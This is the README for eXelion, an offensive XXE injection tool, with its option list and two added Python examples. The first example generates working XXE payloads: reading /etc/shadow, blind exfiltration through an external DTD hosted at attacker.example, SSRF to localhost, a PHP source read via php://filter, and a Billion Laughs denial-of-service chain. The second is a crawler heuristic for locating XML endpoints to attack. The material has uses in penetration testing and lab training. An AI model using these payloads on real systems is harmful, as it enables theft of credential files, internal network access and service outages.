__ __ _ _
\ \ / / | | (_)
___ \ V / ___ | | _ ___ _ __
/ _ \ > < / _ \ | | | | / _ \ | '_ \
| __/ / . \ | __/ | | | | | (_) | | | | |
\___| /_/ \_\ \___| |_| |_| \___/ |_| |_|
Version: 0.5
Author: K3res
Github: https://github.com/K3res/
Check it Out!: https://github.com/B0lg0r0v/
eXelion is a simple tool designed to inject XXE payloads and display the results directly in the terminal.
It can also crawl a target URL and search for all XML data interactions.
Additionally, you can customize the request headers and body sent to the URL and observe the response.
🔧 This tool is still a work in progress, and changes may be implemented as development continues
The tool will always show your request and response for your target
For the options -he, -b, -x and -c, wrap the value in single quotes ('') when customizing the header, cookie, body or XXE payload, for example:
python3 eXelion.py -he 'header: header' -b 'Body is there' -u http://google.com
Use the -st option to display all available templates. You can then customize template variables such as the protocol and the file path:
python3 eXelion.py -xlfi -vfp '/tmp/test.txt' -vp 'http'
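The template options above substitute a file path, entity name, protocol or URL into a fixed XXE skeleton. The following is an added example written for this README, not eXelion's own template code: it builds the in-band, blind (external DTD) and SSRF payload shapes from substitutable variables and generates a Billion Laughs entity chain of configurable size. The template names, keyword arguments and default URLs (attacker.example, 127.0.0.1) are assumptions chosen for the example.

```python
"""Added example: build XXE payloads from templates with substitutable variables.

Illustration code written for this README, not eXelion's template implementation.
Template names and the keyword arguments (file_path, entity, protocol, ssrf_url,
dtd_url) are this example's own choices and only loosely mirror -vfp/-ve/-vp/-vsu.
"""
from __future__ import annotations

import re
from string import Template

# Payload skeletons. $entity, $protocol, $file_path, $ssrf_url and $dtd_url are
# filled in by build_payload(); the default file path matches the README (/etc/shadow).
TEMPLATES: dict[str, str] = {
    # In-band read: the external entity is expanded inside the server's response.
    "file_disclosure": (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE data [\n"
        '  <!ENTITY $entity SYSTEM "$protocol://$file_path">\n'
        "]>\n"
        "<data>&$entity;</data>"
    ),
    # Blind/out-of-band read: the parser fetches an attacker-hosted DTD ($dtd_url)
    # which is expected to define &send; so that the file content leaves via a request.
    "blind_file_disclosure": (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE data [\n"
        '  <!ENTITY % $entity SYSTEM "$protocol://$file_path">\n'
        '  <!ENTITY % dtd SYSTEM "$dtd_url">\n'
        "  %dtd;\n"
        "]>\n"
        "<data>&send;</data>"
    ),
    # SSRF: the entity points at an internal URL instead of a local file.
    "ssrf": (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE data [\n"
        '  <!ENTITY $entity SYSTEM "$ssrf_url">\n'
        "]>\n"
        "<data>&$entity;</data>"
    ),
}

# Conservative subset of the XML Name production, enough to reject broken entity names.
_ENTITY_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9._-]*")


def build_payload(
    template: str,
    *,
    file_path: str = "/etc/shadow",
    entity: str = "xxe",
    protocol: str = "file",
    ssrf_url: str = "http://127.0.0.1/",            # assumed default for the example
    dtd_url: str = "http://attacker.example/evil.dtd",  # assumed default for the example
) -> str:
    """Return the chosen template with all variables substituted."""
    if not _ENTITY_NAME.fullmatch(entity):
        raise ValueError(f"invalid XML entity name: {entity!r}")
    try:
        skeleton = TEMPLATES[template]
    except KeyError:
        raise ValueError(f"unknown template {template!r}; choose from {sorted(TEMPLATES)}") from None
    return Template(skeleton).substitute(
        file_path=file_path, entity=entity, protocol=protocol, ssrf_url=ssrf_url, dtd_url=dtd_url
    )


def billion_laughs(depth: int = 9, fanout: int = 10, entity: str = "lol") -> str:
    """Nested entity-expansion (DoS) payload; depth=9/fanout=10 is the classic ~3 GB chain."""
    lines = [f'<!ENTITY {entity}0 "{entity}">']
    for level in range(1, depth + 1):
        refs = f"&{entity}{level - 1};" * fanout
        lines.append(f'<!ENTITY {entity}{level} "{refs}">')
    body = "\n  ".join(lines)
    return f'<?xml version="1.0"?>\n<!DOCTYPE data [\n  {body}\n]>\n<data>&{entity}{depth};</data>'


def expansion_size(depth: int = 9, fanout: int = 10, entity: str = "lol") -> int:
    """Bytes the root reference expands to: fanout**depth copies of the leaf text."""
    return fanout ** depth * len(entity)


if __name__ == "__main__":
    # Equivalent of -xlfi -vfp '/tmp/test.txt' -vp 'http' in spirit: swap path and protocol.
    print(build_payload("file_disclosure", file_path="/tmp/test.txt"))
    print(build_payload("file_disclosure", protocol="php",
                        file_path="filter/convert.base64-encode/resource=index.php"))
    print(billion_laughs(depth=2, fanout=3), "->", expansion_size(2, 3), "bytes")
```

The PHP case shows why the protocol is a variable: with protocol "php" and a filter path, the same skeleton yields a base64-wrapped read of a PHP source file, which avoids the parse errors a raw PHP file would cause when expanded inside XML.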
To search for XML interactions, use the -cr option. Use -crv instead to list every crawled URL, including those where no XML interaction was found.
Note: The duration may vary depending on performance and network connection.
python3 eXelion.py -crv -u https://0a2a006c04b11c5881400c75008b0050.web-security-academy.net/
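The crawler's job is to flag URLs where XML is exchanged, and the -crv mode also reports the URLs where nothing was found. The block below is an added example written for this README, not eXelion's crawler: it classifies fetched pages offline using the signals a practitioner would look for (an XML response content type, an XML prologue or SOAP envelope in the body, a page that references an XML media type in scripts or link tags, and a file upload that accepts .xml/.svg/Office formats, which are parsed as XML server-side). The sample pages and hostnames are constructed for the example.

```python
"""Added example: classify crawled pages for XML interactions.

Illustration written for this README, not eXelion's crawler. SAMPLE_PAGES are
constructed responses; the heuristics below are this example's own choices.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Media types that mean the endpoint speaks XML (any ".../*+xml" also counts).
XML_CONTENT_TYPES = {"application/xml", "text/xml", "application/soap+xml"}
# Body starts with an XML prologue or a (namespaced) SOAP Envelope element.
XML_PROLOGUE = re.compile(r"^\s*<\?xml\b|^\s*<(?:[\w-]+:)?Envelope\b", re.I)
# A quoted XML media type in HTML/JS, e.g. headers:{'Content-Type':'application/xml'}.
XML_MEDIA_TYPE_REF = re.compile(r"""["'](application/(?:[\w.+-]*\+)?xml|text/xml)["']""", re.I)
INPUT_TAG = re.compile(r"<input\b[^>]*>", re.I)
TYPE_FILE = re.compile(r"""\btype\s*=\s*["']?file\b""", re.I)
ACCEPT_ATTR = re.compile(r"""\baccept\s*=\s*["']([^"']*)["']""", re.I)
# Upload formats that are XML, or zipped XML, and therefore reach an XML parser.
XML_UPLOAD_HINTS = (".xml", ".svg", ".docx", ".xlsx", ".pptx", ".odt",
                    "+xml", "text/xml", "application/xml")


@dataclass
class Finding:
    url: str
    reasons: list[str] = field(default_factory=list)  # empty => crawled, nothing found


def content_type(headers: dict[str, str]) -> str:
    """Lower-cased media type without parameters, or '' if the header is absent."""
    for name, value in headers.items():
        if name.lower() == "content-type":
            return value.split(";")[0].strip().lower()
    return ""


def is_xml_content_type(ct: str) -> bool:
    return ct in XML_CONTENT_TYPES or ct.endswith("+xml")


def classify(url: str, headers: dict[str, str], body: str) -> Finding | None:
    """Return a Finding with the reasons the page counts as an XML interaction, else None."""
    reasons: list[str] = []
    ct = content_type(headers)
    if is_xml_content_type(ct):
        reasons.append(f"response content-type {ct}")
    if XML_PROLOGUE.search(body):
        reasons.append("response body is an XML document")
    if ct.startswith("text/html") or not ct:
        ref = XML_MEDIA_TYPE_REF.search(body)
        if ref:
            reasons.append(f"page references XML media type {ref.group(1).lower()}")
        for tag in INPUT_TAG.findall(body):
            accept = ACCEPT_ATTR.search(tag)
            if TYPE_FILE.search(tag) and accept and any(
                hint in accept.group(1).lower() for hint in XML_UPLOAD_HINTS
            ):
                reasons.append(f"file upload accepts {accept.group(1)}")
    return Finding(url, reasons) if reasons else None


def scan(pages, verbose: bool = False) -> list[Finding]:
    """-cr behaviour: only hits. verbose=True mirrors -crv: every URL, hits carry reasons."""
    results: list[Finding] = []
    for url, headers, body in pages:
        finding = classify(url, headers, body)
        if finding:
            results.append(finding)
        elif verbose:
            results.append(Finding(url))
    return results


# Constructed sample responses (url, response headers, body); no network is used.
SAMPLE_PAGES = [
    ("https://target.example/", {"Content-Type": "text/html; charset=utf-8"},
     "<html><body><a href='/api/soap'>SOAP</a><p>Welcome</p></body></html>"),
    ("https://target.example/api/soap", {"Content-Type": "text/xml; charset=utf-8"},
     '<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
     "<soap:Body/></soap:Envelope>"),
    ("https://target.example/stock", {"Content-Type": "text/html"},
     "<html><script>fetch('/product/stock',{method:'POST',"
     "headers:{'Content-Type':'application/xml'},body:xml})</script></html>"),
    ("https://target.example/avatar", {"Content-Type": "text/html"},
     '<form method="post" enctype="multipart/form-data">'
     '<input type="file" name="avatar" accept=".png,.svg"></form>'),
    ("https://target.example/about", {"Content-Type": "text/html"}, "<html><body>About us</body></html>"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_PAGES, verbose=True):
        print(f.url, "->", "; ".join(f.reasons) or "no XML interaction found")
```

The upload heuristic is the one most often missed by hand: an avatar form that accepts .svg hands the file to an XML parser, so it is as much an XXE candidate as a SOAP endpoint.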
usage: eXelion.py [options]
Tools for XXE/XEE Payloads
options:
-h, --help show this help message and exit
Request options:
-u URL, --url URL The target URL, e.g. http://example.com/XML
-he HEADERS, --headers HEADERS
Use custom headers
-c COOKIE, --cookie COOKIE
Use custom cookie
-b BODY, --body BODY Use custom body
-x XXE, --xxe XXE Use custom XXE payload
-xf XXEFILE, --xxefile XXEFILE
Use custom XML file with XXE payload
Special options:
-cr, --crawlex Search the website for XML interactions
-crv, --crawlexverbose
display all crawled URLs, even if no XML was found
-t, --time Report the finish time when the run completes
-drh, --disableResponseHeader
Disable the display of the response header
-drb, --disableResponseBody
Disable the display of the response body
Templates options:
-st, --showTemplates show all available templates
-xfd, --xxeFileDisclosure
Use an XXE template to read a file (default file path: /etc/shadow)
-xebl, --xeeBillionLaughs
Use the Billion Laughs template (DoS attack)
-xlfi, --xxeLocalFileInclusion
Use an XXE template to read a file via LFI (default file path: /etc/shadow)
-xblfi, --xxeBlindLocalFileInclusion
Use an XXE template to read a file via blind LFI (default file path: /etc/shadow)
-xacb, --xxeAccessControlBypass
Use an XXE bypass to read a PHP file
-xs, --xxeSSRF Use an XXE template with an SSRF
Variable Templates Options:
-vfp VARIABLEFILEPATH, --variableFilePath VARIABLEFILEPATH
Variable to change the file path used by the template
-ve VARIABLEENTITY, --variableEntity VARIABLEENTITY
Variable to change the entity name
-vp VARIABLEPROTOCOL, --variableProtocol VARIABLEPROTOCOL
Variable to change the protocol type
-vsu VARIABLESSRF, --variableSSRF VARIABLESSRF
Variable to change the URL for SSRF attacks
-vulfi VARIABLEURLLFI, --variableUrlLFI VARIABLEURLLFI
Variable to change the URL for LFI attacks
📤 Customize your own request.
📑 Input your own XXE payloads or load an XML file containing your payloads.
📝 Use and customize the XXE templates.
🔎 Search a website for XML interactions.
⚙️ Pip install support
⚙️ Improve tool performance
⚙️ Function to use a wordlist for the variables in templates
⚙️ Function to create an SVG file containing an XXE payload
⚙️ Interactive function to create your own XXE payload
⚙️ Function to create an external DTD file
⚙️ Function for XML injection
⚙️ Function for XPath injection
Install eXelion:
git clone https://github.com/K3res/eXelion.git
cd eXelion/corex
pip3 install -r requirements.txt
Check out B0lg0r0v's GitHub site for interesting tools like Elyzer or Elixier.
This project, including the hacking tool, was developed solely to enhance my coding skills. Users of this tool are fully responsible for any consequences arising from its use.